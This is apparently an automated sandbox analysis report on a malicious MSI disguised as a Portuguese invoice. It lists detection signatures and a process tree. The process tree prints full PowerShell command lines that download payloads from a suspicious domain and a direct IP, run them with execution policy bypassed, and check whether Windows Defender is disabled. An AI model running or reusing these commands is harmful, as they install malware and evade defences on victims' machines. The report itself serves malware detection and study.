Windows
Analysis Report
Fatura931Pendente956.pdf761.msi
Overview
General Information
Detection
Field | Value |
---|---|
Score | 100 |
Range | 0 - 100 |
Whitelisted | false |
Confidence | 100% |
Signatures
Multi AV Scanner detection for submitted file
Yara detected MalDoc
Yara detected Powershell download and execute
AI detected suspicious URL
AI detected suspicious sample
Bypasses PowerShell execution policy
Creates files in the system32 config directory
Loading BitLocker PowerShell Module
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious execution chain found
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential DLL File Download Via PowerShell Invoke-WebRequest
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Suspicious MsiExec Embedding Parent
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- msiexec.exe (PID: 3288 cmdline: `"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Fatura931Pendente956.pdf761.msi"` MD5: E5DA170027542E25EDE42FC54C929077)
- msiexec.exe (PID: 3720 cmdline: `C:\Windows\system32\msiexec.exe /V` MD5: E5DA170027542E25EDE42FC54C929077)
  - msiexec.exe (PID: 7068 cmdline: `C:\Windows\syswow64\MsiExec.exe -Embedding 7499E4E7F1DA1FA24C606FAD5E4A5918` MD5: 9D09DC1EDA745A5F87553048E57620CF)
    - powershell.exe (PID: 6344 cmdline: `-NoProfile -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss82F.ps1"` MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      - conhost.exe (PID: 6256 cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D)
    - powershell.exe (PID: 7488 cmdline: `-NoProfile -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss381D.ps1"` MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      - conhost.exe (PID: 7496 cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D)
    - chrome.exe (PID: 7608 cmdline: `"C:\Program Files\Google\Chrome\Application\chrome.exe" https://yqvn-6391824-metaflux-xytrmnwl-246.1mp3.org/fatura/fatura.html` MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      - chrome.exe (PID: 7872 cmdline: `"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=2060,i,12800759759220068023,3878427892193001850,262144 /prefetch:8` MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    - powershell.exe (PID: 4856 cmdline: `-NoProfile -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss4957.ps1"` MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      - conhost.exe (PID: 908 cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D)
    - powershell.exe (PID: 6300 cmdline: `-NoProfile -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss6678.ps1"` MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      - conhost.exe (PID: 1216 cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D)
    - powershell.exe (PID: 5672 cmdline: `-NoProfile -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss8908.ps1"` MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      - conhost.exe (PID: 7112 cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D)
    - powershell.exe (PID: 1020 cmdline: `-NoProfile -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssA4C2.ps1"` MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      - conhost.exe (PID: 6680 cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D)
    - powershell.exe (PID: 1236 cmdline: `-NoProfile -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssD54C.ps1"` MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      - conhost.exe (PID: 4164 cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D)
    - powershell.exe (PID: 3408 cmdline: `-NoProfile -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss1566.ps1"` MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      - conhost.exe (PID: 7236 cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D)
    - powershell.exe (PID: 6224 cmdline: `-NoProfile -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss63D8.ps1"` MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      - conhost.exe (PID: 5624 cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D)
    - powershell.exe (PID: 6052 cmdline: `-NoProfile -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssBA2A.ps1"` MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      - conhost.exe (PID: 884 cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D)
    - powershell.exe (PID: 1360 cmdline: `-NoProfile -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss2A2E.ps1"` MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      - conhost.exe (PID: 3632 cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7312 cmdline: `Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\temp\ShowUpdateScreen.ps1` MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 7320 cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D)
- svchost.exe (PID: 7736 cmdline: `C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS` MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- powershell.exe (PID: 7228 cmdline: `PowerShell.exe -NoProfile -ExecutionPolicy Bypass -Command & { if ((Get-MpPreference).DisableRealtimeMonitoring -eq $false) { Start-ScheduledTask -TaskName 'ATD' } }` MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 736 cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7188 cmdline: `Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\temp\ShowUpdateScreen.ps1` MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 6016 cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - csc.exe (PID: 5900 cmdline: `"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\swfob4yn.cmdline"` MD5: F65B029562077B648A6A5F6A1AA76A66)
    - cvtres.exe (PID: 5444 cmdline: `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA037.tmp" "c:\Users\user\AppData\Local\Temp\CSC9B11AECFE9254054A1433CAC9323B2.TMP"` MD5: C877CBB966EA5939AA2A17B6A5160950)
- powershell.exe (PID: 6468 cmdline: `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "& { $folderPath = 'C:\LocalNow' $fileUrl = 'https://qsif-9432751-neurallink-bwlprtyx-099.computador-hardware.net/simples/rosa.png' $downloadedFile = Join-Path $folderPath 'rosa.png' $zipFile = Join-Path $folderPath 'rosa.zip' $extractedFolder = Join-Path $folderPath 'Extracted' while ($true) { Start-Sleep -Seconds 60 if (!(Test-Path -Path $folderPath)) { Write-Output 'Pasta LocalNow não encontrada. Aguardando nova verificação.' continue } # Verifica se existe algum arquivo DLL na pasta $dllFiles = Get-ChildItem -Path $folderPath -Filter *.dll -Recurse -ErrorAction SilentlyContinue if ($dllFiles -and $dllFiles.Count -gt 0) { Write-Output 'Arquivo DLL encontrado: $($dllFiles[0].Name)' break # Sai do loop while } Write-Output 'Arquivo DLL não encontrado. Reiniciando o processo.' # Limpa a pasta antes de novo download try { Get-ChildItem -Path $folderPath -Recurse | Remove-Item -Force -Recurse -ErrorAction Stop # Download e extração Invoke-WebRequest -Uri $fileUrl -OutFile $downloadedFile -ErrorAction Stop Rename-Item -Path $downloadedFile -NewName $zipFile -ErrorAction Stop Expand-Archive -Path $zipFile -DestinationPath $extractedFolder -Force -ErrorAction Stop Write-Output 'Processo de extração completado com sucesso.' } catch { Write-Output 'Erro durante o processo: $($_.Exception.Message)' Start-Sleep -Seconds 30 # Espera antes de tentar novamente } } exit # Encerra o script após sair do loop }"` MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 1144 cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 5376 cmdline: `PowerShell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\Executar01aa.ps1"` MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 600 cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7380 cmdline: `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "& { $folderPath = 'C:\LocalNow' $loopCompleted = $false for ($i = 0; $i -lt 3; $i++) { Start-Sleep -Seconds 60 # Verifica as chaves do Registro $keyPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' $disableAntiSpyware = (Get-ItemProperty -Path $keyPath -Name 'DisableAntiSpyware' -ErrorAction SilentlyContinue).DisableAntiSpyware -eq 1 $disableAntiVirus = (Get-ItemProperty -Path $keyPath -Name 'DisableAntiVirus' -ErrorAction SilentlyContinue).DisableAntiVirus -eq 1 # Se ambas as chaves existirem com valor 1, sai do loop e define que o loop completou if ($disableAntiSpyware -eq 1 -and $disableAntiVirus -eq 1) { $loopCompleted = $true break } } # Se o loop tiver sido interrompido, verifica se a pasta já existe e a cria se necessário if ($loopCompleted -and !(Test-Path -Path $folderPath)) { New-Item -ItemType Directory -Path $folderPath -Force Write-Output "Pasta C:\LocalNow criada com sucesso após o loop completar." } }"` MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 7576 cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 6704 cmdline: `PowerShell.exe -NoProfile -ExecutionPolicy Bypass -Command "if (-not (Test-Path 'C:\temp')) { New-Item -ItemType Directory -Path 'C:\temp' -Force | Out-Null } try { Invoke-WebRequest -Uri 'http://192.124.216.14/vd/sis/DownSistem.ps1' -OutFile 'C:\temp\DownSistem.ps1' -UseBasicParsing Write-Output 'Arquivo DownSistem.ps1 baixado com sucesso em C:\temp\DownSistem.ps1' } catch { Write-Output 'Erro ao baixar o arquivo DownSistem.ps1: ' exit 1 }"` MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 6788 cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 6736 cmdline: `PowerShell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\temp\DownSistem.ps1"` MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 6772 cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7364 cmdline: `PowerShell.exe -NoProfile -ExecutionPolicy Bypass -File C:\temp\sistema.ps1` MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 7332 cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
 | JoeSecurity_MalDoc | Yara detected MalDoc | Joe Security | |

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
 | JoeSecurity_MalDoc | Yara detected MalDoc | Joe Security | |

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |

System Summary
Source | Author |
---|---|
 | Florian Roth (Nextron Systems) |
 | Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) |
 | Nasreddine Bencherchali (Nextron Systems) |